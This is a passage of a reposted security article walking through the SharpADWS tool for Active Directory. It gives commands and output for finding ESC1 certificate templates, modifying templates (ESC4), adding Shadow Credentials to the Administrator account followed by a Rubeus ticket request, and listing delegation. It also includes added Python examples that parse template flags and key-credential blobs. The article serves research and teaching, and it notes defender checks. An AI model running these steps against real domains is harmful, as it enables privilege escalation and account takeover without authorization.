        WriteDacl                 : Domain Admins, Enterprise Admins
        WriteOwner                : Domain Admins, Enterprise Admins
        WriteProperty             : Domain Admins, Enterprise Admins, Domain Users

    CA Name                       :
    Template Name                 : UserSignature
    Enabled                       : False
    Client Authentication         : True
    Enrollment Agent              : False
    Any Purpose                   : False
    Enrollee Supplies Subject     : False
    pKIExtendedKeyUsage           : Secure Email, Client Authentication
    msPKI-Certificate-Name-Flag   : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
    msPkI-Enrollment-Flag         : AUTO_ENROLLMENT
    msPKI-Private-Key-Flag        : ATTEST_NONE
    CA Permissions                :
      Enrollment Rights           : Domain Admins, Domain Users, Enterprise Admins
      Object Control Permissions  :
        WriteDacl                 : Domain Admins, Enterprise Admins
        WriteOwner                : Domain Admins, Enterprise Admins
        WriteProperty             : Domain Admins, Enterprise Admins, Domain Users

    # ...

find also accepts the -enrolleeSuppliesSubject and -clientAuth options, which keep only the templates that have the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag set and that allow Client Authentication, the two main prerequisites of an ESC1 template:

C:\Users\Marcus>SharpADWS.exe Certify -action find -enrolleeSuppliesSubject -clientAuth

[*] Find CA and certificate templates
[*] Using the search base 'CN=Configuration,DC=corp,DC=local'

[*] Listing info about the Enterprise CA 'corp-DC01-CA'

    # ...

[*] Available Certificates Templates

    CA Name                       : CORP-DC01-CA
    Template Name                 : User
    Enabled                       : True
    Client Authentication         : True
    Enrollment Agent              : False
    Any Purpose                   : False
    Enrollee Supplies Subject     : True
    pKIExtendedKeyUsage           : Encrypting File System, Secure Email, Client Authentication
    msPKI-Certificate-Name-Flag   : ENROLLEE_SUPPLIES_SUBJECT, SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
    msPkI-Enrollment-Flag         : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    msPKI-Private-Key-Flag        : EXPORTABLE_KEY
    CA Permissions                :
      Enrollment Rights           : Domain Admins, Domain Users, Enterprise Admins
      Object Control Permissions  :
        WriteDacl                 : Domain Admins, Enterprise Admins
        WriteOwner                : Domain Admins, Enterprise Admins
        WriteProperty             : Domain Admins, Enterprise Admins, Marcus, Domain Users

    # ...

Note that the find action of the Certify method depends on the cache created beforehand with the Cache method.

The modify action of the Certify method lets you change certificate template attributes when you have write access to the template (the ESC4 situation; note the WriteProperty grant to Domain Users on the User template above), for example setting the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag or enabling Client Authentication (the -template parameter is not listed in the -h output above):

C:\Users\Marcus>SharpADWS.exe Certify -action modify -template User -enrolleeSuppliesSubject -clientAuth

[*] Enable enrollee supplies subject for template User successfully!
[*] Enable client authentication for template User successfully!
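Filtering on enrolleeSuppliesSubject and clientAuth alone over-reports: an ESC1 template also has to be published, must not require manager approval (CT_FLAG_PEND_ALL_REQUESTS in msPKI-Enrollment-Flag) or authorized signatures (msPKI-RA-Signature), and must be enrollable by a low-privileged group. The added example below (not SharpADWS or Certify code) checks all of those conditions on a template record and computes the attribute values the modify action writes. Flag values and EKU OIDs are the documented AD CS schema constants; the template record is constructed to match the User template printed above.

```python
"""ESC1 classification of certificate templates and the values a 'modify' writes.

Added example, not SharpADWS/Certify code. Flag bits and OIDs are the AD CS
schema constants; the template record is constructed.
"""
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # msPKI-Enrollment-Flag (manager approval)

# EKUs that make the issued certificate usable for AD authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "2.5.29.37.0": "Any Purpose",
}
CLIENT_AUTH_OID = "1.3.6.1.5.5.7.3.2"
LOW_PRIV_GROUPS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}


def allows_authentication(ekus):
    """Empty pKIExtendedKeyUsage means 'all purposes', which includes authentication."""
    return not ekus or any(oid in AUTH_EKUS for oid in ekus)


def esc1_findings(template):
    """Unmet ESC1 conditions; an empty list means the template is ESC1-vulnerable."""
    missing = []
    if not template["enabled"]:
        missing.append("template not published on any CA")
    if not template["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        missing.append("enrollee does not supply subject")
    if not allows_authentication(template["ekus"]):
        missing.append("no authentication EKU")
    if template["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        missing.append("manager approval required")
    if template["ra_signatures"] > 0:
        missing.append("authorized signatures required")
    if not set(template["enrollment_rights"]) & LOW_PRIV_GROUPS:
        missing.append("no low-privileged enrollment rights")
    return missing


def modify_for_esc1(template, enrollee_supplies_subject=True, client_auth=True):
    """Attribute values the modify action would write (needs WriteProperty on the
    template, i.e. ESC4). Returns a modified copy; the input is left untouched."""
    t = dict(template, ekus=list(template["ekus"]))
    if enrollee_supplies_subject:
        t["name_flag"] |= CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    if client_auth and CLIENT_AUTH_OID not in t["ekus"]:
        t["ekus"].append(CLIENT_AUTH_OID)
    return t


# Constructed record modelled on the 'User' template from the find output above.
USER_TEMPLATE = {
    "name": "User",
    "enabled": True,
    # SUBJECT_ALT_REQUIRE_UPN | SUBJECT_ALT_REQUIRE_EMAIL | SUBJECT_REQUIRE_EMAIL
    # | SUBJECT_REQUIRE_DIRECTORY_PATH, no ENROLLEE_SUPPLIES_SUBJECT
    "name_flag": 0x02000000 | 0x00200000 | 0x40000000 | 0x80000000,
    # INCLUDE_SYMMETRIC_ALGORITHMS | PUBLISH_TO_DS | AUTO_ENROLLMENT
    "enrollment_flag": 0x1 | 0x8 | 0x20,
    "ra_signatures": 0,
    # EFS, Secure Email, Client Authentication
    "ekus": ["1.3.6.1.4.1.311.10.3.4", "1.3.6.1.5.5.7.3.4", "1.3.6.1.5.5.7.3.2"],
    "enrollment_rights": ["Domain Admins", "Domain Users", "Enterprise Admins"],
}

if __name__ == "__main__":
    print("before:", esc1_findings(USER_TEMPLATE) or "ESC1")
    print("after modify:", esc1_findings(modify_for_esc1(USER_TEMPLATE)) or "ESC1")
```

With the stock User template the only unmet condition is the subject flag, which is exactly what the modify action above flips; a template that additionally requires manager approval would still be reported as safe after the same modification.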

Whisker

The Whisker method carries out the full Shadow Credentials attack lifecycle, like Whisker does.

The list action lists the values of the target account's msDS-KeyCredentialLink attribute:

C:\Users\Marcus>SharpADWS.exe Whisker -action list -target DC01$

[*] List deviced for DC01$:
[*]     DeviceID: c9fdae6b-f6a1-4880-a498-6dc89814e596   CreationTime: 2/13/2024 7:43:49 PM
[*]     DeviceID: ee48b31f-71b1-4821-b21e-1ca28fad2ae9   CreationTime: 2/13/2024 8:06:52 PM
[*]     DeviceID: 80c31faf-8b0b-4af6-8350-22de2d91a4fd   CreationTime: 2/13/2024 8:01:50 PM

With write access to the attribute, the add action adds a key to the target account's msDS-KeyCredentialLink attribute for a Shadow Credentials attack (the -cert-pass parameter is not listed in the -h output above):

C:\Users\Marcus>SharpADWS.exe Whisker -action add -target Administrator -cert-pass Passw0rd

[*] Certificate generated
[*] KeyCredential generated with DeviceID 7d9e0151-5fd2-46d5-ac3d-dce8a71399f2
[*] Updated the msDS-KeyCredentialLink attribute successfully!
[*] You can now run Rubeus with the following syntax:

Rubeus.exe asktgt /user:Administrator /certificate:[...] /password:"Passw0rd" /domain:corp.local /getcredentials /show

The remove action takes a -device-id and removes the matching key from the target object's msDS-KeyCredentialLink attribute:

C:\Users\Marcus>SharpADWS.exe Whisker -action remove -target DC01$ -device-id c9fdae6b-f6a1-4880-a498-6dc89814e596

[*] Found value to remove
[*] msDS-KeyCredentialLink value has been removed:
[*]     DeviceID: c9fdae6b-f6a1-4880-a498-6dc89814e596   CreationTime: 2/13/2024 7:43:49 PM
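The DeviceID and CreationTime printed by list and remove live inside the KEYCREDENTIALLINK_BLOB that each msDS-KeyCredentialLink value carries in DN-Binary form (`B:<hex length>:<hex>:<owner DN>`). The added example below (not SharpADWS or Whisker code) builds and parses that layout as documented in MS-ADTS section 2.2.20: a 4-byte version (0x200) followed by entries of 2-byte length, 1-byte identifier and value. Only the fields needed for list/remove are populated; the key material is a placeholder byte string, not a usable public key, and the GUID and timestamp are taken from the list output above.

```python
"""Build and parse msDS-KeyCredentialLink values (DN-Binary + KEYCREDENTIALLINK_BLOB).

Added example, not SharpADWS/Whisker code. Blob layout per MS-ADTS 2.2.20;
the KeyMaterial here is a placeholder rather than a real public key.
"""
import struct
import uuid
from datetime import datetime, timedelta, timezone

# KEYCREDENTIALLINK_ENTRY identifiers
KEY_ID, KEY_HASH, KEY_MATERIAL, KEY_USAGE, KEY_SOURCE = 0x01, 0x02, 0x03, 0x04, 0x05
DEVICE_ID, CUSTOM_KEY_INFO, LAST_LOGON, CREATION_TIME = 0x06, 0x07, 0x08, 0x09
VERSION = 0x200
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def to_filetime(dt):
    """FILETIME: 100 ns intervals since 1601-01-01 UTC."""
    return ((dt - EPOCH_1601) // timedelta(microseconds=1)) * 10


def from_filetime(ft):
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def build_blob(device_id, created, key_material=b"\x00" * 16):
    """Minimal blob; a real entry carries a DER SubjectPublicKeyInfo in KeyMaterial."""
    entries = [
        (KEY_MATERIAL, key_material),
        (KEY_USAGE, b"\x01"),          # NGC
        (KEY_SOURCE, b"\x00"),         # AD
        (DEVICE_ID, device_id.bytes_le),
        (CREATION_TIME, struct.pack("<Q", to_filetime(created))),
    ]
    blob = struct.pack("<I", VERSION)
    for ident, value in entries:
        blob += struct.pack("<HB", len(value), ident) + value
    return blob


def parse_blob(blob):
    """Return {identifier: value bytes}; rejects unknown versions."""
    (version,) = struct.unpack_from("<I", blob, 0)
    if version != VERSION:
        raise ValueError(f"unexpected KeyCredentialLink version {version:#x}")
    entries, off = {}, 4
    while off < len(blob):
        length, ident = struct.unpack_from("<HB", blob, off)
        off += 3
        entries[ident] = blob[off:off + length]
        off += length
    return entries


def to_dn_binary(blob, owner_dn):
    h = blob.hex().upper()
    return f"B:{len(h)}:{h}:{owner_dn}"


def from_dn_binary(value):
    _, hexlen, h, dn = value.split(":", 3)
    if int(hexlen) != len(h):
        raise ValueError("DN-Binary length field does not match payload")
    return bytes.fromhex(h), dn


def device_id_of(value):
    return str(uuid.UUID(bytes_le=parse_blob(from_dn_binary(value)[0])[DEVICE_ID]))


def list_keys(values):
    """What the list action prints: (DeviceID, CreationTime) per attribute value."""
    out = []
    for v in values:
        e = parse_blob(from_dn_binary(v)[0])
        created = from_filetime(struct.unpack("<Q", e[CREATION_TIME])[0])
        out.append((str(uuid.UUID(bytes_le=e[DEVICE_ID])), created))
    return out


def remove_key(values, device_id):
    """The remove action: drop only the value whose DeviceID matches."""
    return [v for v in values if device_id_of(v) != device_id]


if __name__ == "__main__":
    did = uuid.UUID("c9fdae6b-f6a1-4880-a498-6dc89814e596")
    when = datetime(2024, 2, 13, 19, 43, 49, tzinfo=timezone.utc)
    val = to_dn_binary(build_blob(did, when), "CN=DC01,OU=Domain Controllers,DC=corp,DC=local")
    print(list_keys([val]))
    print(remove_key([val], str(did)))
```

A defender reviewing the attribute (for example from a 5136 directory change event) can run the same parser to see whether a newly added entry's DeviceID corresponds to a device actually enrolled for Windows Hello for Business, which is the legitimate writer of this attribute.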

FindDelegation

The FindDelegation method enumerates every delegation relationship in the current domain; it takes no options or parameters:

C:\Users\Marcus\desktop>SharpADWS.exe FindDelegation

AccountName   AccountType   DelegationType                       DelegationRightsTo
------------  ------------  -----------------------------------  -----------------------------------------------
DC01$         Computer      Unconstrained                        N/A
PENTEST$      Computer      Resource-Based Constrained           DC01$
WIN-MSSQL$    Computer      Constrained w/ Protocol Transition   ldap/DC01.corp.local/corp.local
WIN-MSSQL$    Computer      Constrained w/ Protocol Transition   ldap/DC01.corp.local
WIN-MSSQL$    Computer      Constrained w/ Protocol Transition   ldap/DC01
WIN-MSSQL$    Computer      Constrained w/ Protocol Transition   ldap/DC01.corp.local/CORP
WIN-MSSQL$    Computer      Constrained w/ Protocol Transition   ldap/DC01/CORP
WIN-MSSQL$    Computer      Constrained w/ Protocol Transition   ldap/DC01.corp.local/DomainDnsZones.corp.local
WIN-MSSQL$    Computer      Constrained w/ Protocol Transition   ldap/DC01.corp.local/ForestDnsZones.corp.local
WIN-PC8087$   Computer      Constrained w/ Protocol Transition   cifs/DC01.corp.local/corp.local
WIN-PC8087$   Computer      Constrained w/ Protocol Transition   cifs/DC01.corp.local
WIN-PC8087$   Computer      Constrained w/ Protocol Transition   cifs/DC01
WIN-PC8087$   Computer      Constrained w/ Protocol Transition   cifs/DC01.corp.local/CORP
WIN-PC8087$   Computer      Constrained w/ Protocol Transition   cifs/DC01/CORP

Originally published on the WeChat public account 实战攻防安全 under the title "SharpADWS - 滥用 ADWS 协议枚举 Active Directory" (SharpADWS - Abusing the ADWS Protocol to Enumerate Active Directory).

Disclaimer: the programs (methods) discussed in this article may be offensive in nature and are provided for security research and teaching only. Readers who use this information for any other purpose bear full legal responsibility; this site accepts no legal liability. For questions, contact us by e-mail (use a corporate or otherwise valid mailbox so the message is not filtered; see the home page for contact details).
Posted by admin on CN-SEC中文网. Please retain this link when reposting (thanks to the original author): http://cn-sec.com/archives/2706696.html
